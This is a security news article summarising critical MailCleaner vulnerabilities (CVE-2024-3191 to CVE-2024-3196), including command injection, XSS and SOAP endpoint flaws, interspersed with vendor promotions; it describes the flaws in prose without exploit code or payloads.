Critical MailCleaner Vulnerabilities Let Attackers Execute command


Critical vulnerabilities in MailCleaner versions before 2023.03.14 allow remote attackers to take complete control of the appliance through malicious emails, administrator interaction with attacker sites or links, and exploitation of SOAP endpoints, which compromises the confidentiality and integrity of the MailCleaner system and any emails processed by it. 

Additionally, authenticated attackers with administrative privileges can gain further control by executing arbitrary commands or manipulating files on the system, posing a significant risk, especially in cluster deployments where a single compromised machine can grant attackers control of all cluster members.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

A critical vulnerability in MailCleaner’s email cleaning cronjob allows remote attackers to gain root access through a crafted email, which exploits an OS command injection flaw, enabling arbitrary command execution and complete system compromise.

By taking control of the MailCleaner appliance, attackers can intercept and manipulate all emails the system processes. 

Critical MailCleaner Vulnerabilities Let Attackers Execute command

An unauthenticated attacker can exploit a stored XSS vulnerability in the admin dashboard via a malicious email, which injects malicious JavaScript, allowing session hijacking, data theft, or unauthorized actions as an admin.

This XSS can be chained for OS command injection when combined with other vulnerabilities, significantly amplifying the attack potential. 

The MailCleaner administrator dashboard.
The MailCleaner administrator dashboard.

Document

Integrate ANY.RUN in Your Company for Effective Malware Analysis

Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

  • Real-time Detection
  • Interactive Malware Analysis
  • Easy to Learn by New Security Team members
  • Get detailed reports with maximum data
  • Set Up Virtual Machine in Linux & all Windows OS Versions
  • Interact with Malware Safely

If you want to test all these features now with completely free access to the sandbox:


A critical command injection vulnerability exists in administrator endpoints, allowing attackers to gain root access, which requires either compromised administrator credentials or social engineering to trick administrators into visiting a malicious URL as successful exploitation grants complete system compromise. 

Successful execution of XSS payload sent to monitor logs and view endpoint
Successful execution of XSS payload sent to monitor logs and view endpoint

Two vulnerabilities identified at unspecified endpoints allow attackers to inject malicious JavaScript via crafted links, which inject the script into the user’s browser session upon clicking, enabling session hijacking, data theft, or unauthorized actions under the victim’s identity.

This reflects a reflected Cross-Site scripting (XSS) vulnerability where user-supplied data isn’t sanitized before being echoed back in the response. 

Critical MailCleaner Vulnerabilities Let Attackers Execute command

 Exploiting the command injection vulnerability in the getStats endpoint.

Unauthenticated SOAP endpoint vulnerabilities allow remote attackers to execute arbitrary commands with root privileges, which inject OS commands via user-supplied data, bypassing insufficient validation. 

According to Modezero, in clustered environments, compromising a single member grants full access to all machines, further escalating system compromise. 

Multiple critical and high-severity vulnerabilities have been identified in an unspecified software system, where an unauthenticated attacker can potentially execute arbitrary commands on the system through email (CVE-2024-3191), inject malicious scripts (CVE-2024-3192, CVE-2024-3194), or trick a logged-in user into performing unintended actions (CVE-2024-3193). 

Authenticated users can potentially gain unauthorized access to files (CVE-2024-3195) and execute arbitrary commands on the system through local SOAP endpoints (CVE-2024-3196). 

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide



Source link